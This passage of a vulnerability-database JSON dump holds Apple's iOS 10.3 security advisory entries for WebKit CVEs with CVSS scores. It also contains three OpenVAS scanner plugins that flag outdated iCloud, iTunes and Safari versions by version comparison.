Zero\n\n**WebKit**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: A malicious website may exfiltrate data cross-origin\n\nDescription: A validation issue existed in the handling of page loading. This issue was addressed through improved logic.\n\nCVE-2017-2367: lokihardt of Google Project Zero\n\n**WebKit**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing maliciously crafted web content may lead to universal cross site scripting\n\nDescription: A logic issue existed in the handling of frame objects. This issue was addressed with improved state management.\n\nCVE-2017-2445: lokihardt of Google Project Zero\n\n**WebKit**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A logic issue existed in the handling of strict mode functions. This issue was addressed with improved state management.\n\nCVE-2017-2446: Natalie Silvanovich of Google Project Zero\n\n**WebKit**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Visiting a maliciously crafted website may compromise user information\n\nDescription: A memory corruption issue was addressed through improved memory handling.\n\nCVE-2017-2447: Natalie Silvanovich of Google Project Zero\n\n**WebKit**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed through improved memory handling.\n\nCVE-2017-2463: Kai Kang (4B5F5F4B) of Tencent's Xuanwu Lab (tencent.com) working with Trend Micro's Zero Day Initiative\n\nEntry added March 28, 2017\n\n**WebKit**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A use after free issue was addressed through improved memory management.\n\nCVE-2017-2471: Ivan Fratric of Google Project Zero\n\n**WebKit**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing maliciously crafted web content may lead to universal cross site scripting\n\nDescription: A logic issue existed in frame handling. This issue was addressed through improved state management.\n\nCVE-2017-2475: lokihardt of Google Project Zero\n\n**WebKit**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing maliciously crafted web content may exfiltrate data cross-origin\n\nDescription: A validation issue existed in element handling. This issue was addressed through improved validation.\n\nCVE-2017-2479: lokihardt of Google Project Zero\n\nEntry added March 28, 2017\n\n**WebKit**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing maliciously crafted web content may exfiltrate data cross-origin\n\nDescription: A validation issue existed in element handling. This issue was addressed through improved validation.\n\nCVE-2017-2480: lokihardt of Google Project Zero\n\nCVE-2017-2493: lokihardt of Google Project Zero\n\nEntry updated April 24, 2017\n\n**WebKit JavaScript Bindings**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing maliciously crafted web content may exfiltrate data cross-origin\n\nDescription: Multiple validation issues existed in the handling of page loading. This issue was addressed through improved logic.\n\nCVE-2017-2442: lokihardt of Google Project Zero\n\n**WebKit Web Inspector**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Closing a window while paused in the debugger may lead to unexpected application termination\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2377: Vicki Pfau\n\n**WebKit Web Inspector**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2405: Apple\n\n\n\n## Additional recognition\n\n**XNU**\n\nWe would like to acknowledge Lufeng Li of Qihoo 360 Vulcan Team for their assistance.\n\n**WebKit**\n\nWe would like to acknowledge Yosuke HASEGAWA of Secure Sky Technology Inc. for their assistance.\n\n**Safari**\n\nWe would like to acknowledge Flyin9 (ZhenHui Lee) for their assistance.\n\n**Settings**\n\nWe would like to acknowledge Adi Sharabani and Yair Amit of Skycure for their assistance.\n", "edition": 3, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-08-01T06:52:17", "title": "About the security content of iOS 10.3 - Apple Support", "type": "apple", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2452", "CVE-2017-2423", "CVE-2017-2430", "CVE-2016-9643", "CVE-2017-2486", "CVE-2017-2389", "CVE-2017-2479", "CVE-2017-2397", "CVE-2017-2399", "CVE-2017-2461", "CVE-2017-2384", "CVE-2017-2434", "CVE-2017-2480", "CVE-2017-2450", "CVE-2017-2442", "CVE-2017-2492", "CVE-2017-2412", "CVE-2017-2395", "CVE-2017-6976", "CVE-2016-3619", "CVE-2017-2441", "CVE-2017-2444", "CVE-2017-2435", "CVE-2017-2439", "CVE-2017-2447", "CVE-2017-2433", "CVE-2017-2459", "CVE-2017-2379", "CVE-2017-2454", "CVE-2017-2428", "CVE-2017-2380", "CVE-2017-2471", "CVE-2017-2483", "CVE-2017-2456", "CVE-2017-2485", "CVE-2017-2455", "CVE-2017-2470", "CVE-2017-2469", "CVE-2017-2464", "CVE-2017-2396", "CVE-2017-2451", "CVE-2017-2400", "CVE-2017-2465", "CVE-2017-2406", "CVE-2017-2474", "CVE-2017-2446", "CVE-2017-2405", "CVE-2017-2472", "CVE-2017-2475", "CVE-2017-2468", "CVE-2017-2378", "CVE-2017-2390", "CVE-2017-2417", "CVE-2017-2376", "CVE-2017-2462", "CVE-2017-2487", "CVE-2017-2419", "CVE-2017-2491", "CVE-2017-2377", "CVE-2017-5029", "CVE-2017-2482", "CVE-2017-2466", "CVE-2017-2458", "CVE-2017-2364", "CVE-2017-2448", "CVE-2017-2401", "CVE-2017-2481", "CVE-2017-2453", "CVE-2017-2467", "CVE-2016-9642", "CVE-2017-2404", "CVE-2017-2415", "CVE-2017-2490", "CVE-2017-2484", "CVE-2017-2407", "CVE-2017-2473", "CVE-2017-2424", "CVE-2017-2416", "CVE-2017-2394", "CVE-2017-2457", "CVE-2017-2393", "CVE-2017-2367", "CVE-2017-2386", "CVE-2017-2414", "CVE-2017-2460", "CVE-2017-2463", "CVE-2017-2493", "CVE-2017-2445", "CVE-2017-2398", "CVE-2017-2440", "CVE-2017-2476", "CVE-2017-2432", "CVE-2017-2478"], "modified": "2017-08-01T06:52:17", "id": "APPLE:HT207617", "href": "https://support.apple.com/kb/HT207617", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "openvas": [{"lastseen": "2019-07-17T14:20:34", "description": "This host is installed with Apple iCloud\n and is prone to multiple vulnerabilities.", "cvss3": {}, "published": "2017-05-16T00:00:00", "type": "openvas", "title": "Apple iCloud Multiple Vulnerabilities-HT207607 (Windows)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-2479", "CVE-2017-2480", "CVE-2017-5029", "CVE-2017-2463", "CVE-2017-2493", "CVE-2017-2383"], "modified": "2019-07-05T00:00:00", "id": "OPENVAS:1361412562310810983", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310810983", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Apple iCloud Multiple Vulnerabilities-HT207607 (Windows)\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:apple:icloud\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.810983\");\n script_version(\"2019-07-05T08:56:43+0000\");\n script_cve_id(\"CVE-2017-2493\", \"CVE-2017-2480\", \"CVE-2017-2479\", \"CVE-2017-2463\",\n \"CVE-2017-5029\", \"CVE-2017-2383\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-07-05 08:56:43 +0000 (Fri, 05 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2017-05-16 14:51:38 +0530 (Tue, 16 May 2017)\");\n script_name(\"Apple iCloud Multiple Vulnerabilities-HT207607 (Windows)\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Apple iCloud\n and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws are due to,\n\n - A validation issue existed in element handling.\n\n - Multiple memory corruption issues.\n\n - Poor certificate handling.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow\n attackers to execute arbitrary code, track a user's activity and exfiltrate\n data cross-origin.\");\n\n script_tag(name:\"affected\", value:\"Apple iCloud versions before 6.2\n on Windows.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Apple iCloud 6.2 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"registry\");\n script_xref(name:\"URL\", value:\"https://support.apple.com/en-us/HT207607\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_apple_icloud_detect_win.nasl\");\n script_mandatory_keys(\"apple/icloud/Win/Ver\");\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!icVer = get_app_version(cpe:CPE)){\n exit(0);\n}\n\nif(version_is_less(version:icVer, test_version:\"6.2\"))\n{\n report = report_fixed_ver(installed_version:icVer, fixed_version:\"6.2\");\n security_message(data:report);\n exit(0);\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-03-03T20:31:03", "description": "This host is installed with Apple iTunes\n and is prone to multiple vulnerabilities.", "cvss3": {}, "published": "2017-03-30T00:00:00", "type": "openvas", "title": "Apple iTunes Multiple Vulnerabilities-HT207599 (Windows)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-2479", "CVE-2012-1148", "CVE-2012-1147", "CVE-2015-3415", "CVE-2017-2480", "CVE-2015-3717", "CVE-2016-5300", "CVE-2015-1283", "CVE-2012-6702", "CVE-2016-0718", "CVE-2016-6153", "CVE-2015-3416", "CVE-2017-5029", "CVE-2015-3414", "CVE-2009-3720", "CVE-2015-6607", "CVE-2009-3270", "CVE-2009-3560", "CVE-2017-2463", "CVE-2016-4472", "CVE-2013-7443", "CVE-2017-2383"], "modified": "2020-02-28T00:00:00", "id": "OPENVAS:1361412562310810724", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310810724", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Apple iTunes Multiple Vulnerabilities-HT207599 (Windows)\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:apple:itunes\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.810724\");\n script_version(\"2020-02-28T13:41:47+0000\");\n script_cve_id(\"CVE-2009-3270\", \"CVE-2009-3560\", \"CVE-2009-3720\", \"CVE-2012-1147\",\n \"CVE-2012-1148\", \"CVE-2012-6702\", \"CVE-2013-7443\", \"CVE-2015-1283\",\n \"CVE-2015-3414\", \"CVE-2015-3415\", \"CVE-2015-3416\", \"CVE-2015-3717\",\n \"CVE-2015-6607\", \"CVE-2016-0718\", \"CVE-2016-4472\", \"CVE-2016-5300\",\n \"CVE-2016-6153\", \"CVE-2017-2383\", \"CVE-2017-2463\", \"CVE-2017-2479\",\n \"CVE-2017-2480\", \"CVE-2017-5029\");\n script_bugtraq_id(74228);\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-02-28 13:41:47 +0000 (Fri, 28 Feb 2020)\");\n script_tag(name:\"creation_date\", value:\"2017-03-30 17:37:29 +0530 (Thu, 30 Mar 2017)\");\n script_name(\"Apple iTunes Multiple Vulnerabilities-HT207599 (Windows)\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Apple iTunes\n and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws are due to,\n\n - A client certificate was sent in plaintext. This issue was addressed\n through improved certificate handling.\n\n - The multiple issues existed in SQLite.\n\n - The multiple issues existed in expat.\n\n - The multiple memory corruption issues were addressed through\n improved memory handling.\n\n - The processing maliciously crafted web content may lead to arbitrary\n code execution.\n\n - The processing maliciously crafted web content may exfiltrate data\n cross-origin.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attackers to execute arbitrary code, cause unexpected application termination\n and disclose sensitive information.\");\n\n script_tag(name:\"affected\", value:\"Apple iTunes versions before 12.6 on Windows.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Apple iTunes 12.6.4 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"registry\");\n script_xref(name:\"URL\", value:\"https://support.apple.com/en-us/HT207599\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"secpod_apple_itunes_detection_win_900123.nasl\");\n script_mandatory_keys(\"iTunes/Win/Installed\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!infos = get_app_version_and_location(cpe:CPE, exit_no_version:TRUE))\n exit(0);\n\nvers = infos[\"version\"];\npath = infos[\"location\"];\n\nif(version_is_less(version:vers, test_version:\"12.6\")) {\n report = report_fixed_ver(installed_version:vers, fixed_version:\"12.6\", install_path:path);\n security_message(port:0, data:report);\n exit(0);\n}\n\nexit(99);\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-05-29T18:34:20", "description": "This host is installed with Apple Safari\n and is prone to multiple vulnerabilities.", "cvss3": {}, "published": "2017-03-31T00:00:00", "type": "openvas", "title": "Apple Safari Multiple Vulnerabilities-HT207600", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-9643", "CVE-2017-2389", "CVE-2017-2479", "CVE-2017-2480", "CVE-2017-2442", "CVE-2017-2395", "CVE-2017-2447", "CVE-2017-2433", "CVE-2017-2459", "CVE-2017-2454", "CVE-2017-7071", "CVE-2017-2471", "CVE-2017-2455", "CVE-2017-2470", "CVE-2017-2469", "CVE-2017-2464", "CVE-2017-2396", "CVE-2017-2465", "CVE-2017-2446", "CVE-2017-2405", "CVE-2017-2475", "CVE-2017-2468", "CVE-2017-2378", "CVE-2017-2419", "CVE-2017-2377", "CVE-2017-2466", "CVE-2017-2364", "CVE-2017-2481", "CVE-2017-2453", "CVE-2016-9642", "CVE-2017-2415", "CVE-2017-2424", "CVE-2017-2394", "CVE-2017-2367", "CVE-2017-2386", "CVE-2017-2460", "CVE-2017-2463", "CVE-2017-2445", "CVE-2017-2476", "CVE-2017-2385"], "modified": "2019-05-17T00:00:00", "id": "OPENVAS:1361412562310810727", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310810727", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Apple Safari Multiple Vulnerabilities-HT207600\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:apple:safari\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.810727\");\n script_version(\"2019-05-17T10:45:27+0000\");\n script_cve_id(\"CVE-2016-9642\", \"CVE-2016-9643\", \"CVE-2017-2364\", \"CVE-2017-2367\",\n \"CVE-2017-2377\", \"CVE-2017-2378\", \"CVE-2017-2385\", \"CVE-2017-2386\",\n \"CVE-2017-2389\", \"CVE-2017-2394\", \"CVE-2017-2395\", \"CVE-2017-2396\",\n \"CVE-2017-2405\", \"CVE-2017-2415\", \"CVE-2017-2419\", \"CVE-2017-2424\",\n \"CVE-2017-2433\", \"CVE-2017-2442\", \"CVE-2017-2445\", \"CVE-2017-2446\",\n \"CVE-2017-2447\", \"CVE-2017-2453\", \"CVE-2017-2454\", \"CVE-2017-2455\",\n \"CVE-2017-2459\", \"CVE-2017-2460\", \"CVE-2017-2463\", \"CVE-2017-2464\",\n \"CVE-2017-2465\", \"CVE-2017-2466\", \"CVE-2017-2468\", \"CVE-2017-2469\",\n \"CVE-2017-2470\", \"CVE-2017-2471\", \"CVE-2017-2475\", \"CVE-2017-2476\",\n \"CVE-2017-2479\", \"CVE-2017-2480\", \"CVE-2017-2481\", \"CVE-2017-7071\");\n script_bugtraq_id(94554, 94559, 95725, 97130, 97129, 97136, 97143, 97176, 97133,\n 100613);\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-05-17 10:45:27 +0000 (Fri, 17 May 2019)\");\n script_tag(name:\"creation_date\", value:\"2017-03-31 16:41:59 +0530 (Fri, 31 Mar 2017)\");\n script_name(\"Apple Safari Multiple Vulnerabilities-HT207600\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Apple Safari\n and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exists due to,\n\n - Multiple memory corruption issues,\n\n - A state management issue,\n\n - A spoofing and denial-of-service issue existed in the handling\n of HTTP authentication,\n\n - A spoofing issue existed in the handling of FaceTime prompts,\n\n - A keychain handling issue in keychain item management,\n\n - A prototype access issue in exception handling,\n\n - Multiple memory corruption issues in input validation,\n\n - Multiple memory corruption issues in memory handling,\n\n - A type confusion issue in memory handling,\n\n - An access issue existed in Content Security Policy,\n\n - An uncontrolled resource consumption issue in regex processing,\n\n - An information disclosure issue existed in the processing of OpenGL shaders,\n\n - A memory corruption issue in input validation,\n\n - Multiple validation issues existed in the handling of page loading,\n\n - A validation issue existed in the handling of page loading,\n\n - A logic issue existed in the handling of frame objects,\n\n - A logic issue existed in the handling of strict mode functions.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attackers to disclose sensitive information and can also lead to arbitrary\n code execution.\");\n\n script_tag(name:\"affected\", value:\"Apple Safari versions before 10.1\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Apple Safari 10.1 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.apple.com/en-us/HT207600\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"macosx_safari_detect.nasl\");\n script_mandatory_keys(\"AppleSafari/MacOSX/Version\");\n exit(0);\n}\n\ninclude(\"version_func.inc\");\ninclude(\"host_details.inc\");\n\nif(!infos = get_app_version_and_location(cpe:CPE, exit_no_version:TRUE)) exit(0);\nsafVer = infos['version'];\npath = infos['location'];\n\n\nif(version_is_less(version:safVer, test_version:\"10.1\"))\n{\n report = report_fixed_ver(installed_version:safVer, fixed_version:\"10.1\", install_path:path);\n security_message(data:report);\n exit(0);\n}\nexit(0);\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}]}
CVE-2017-2479
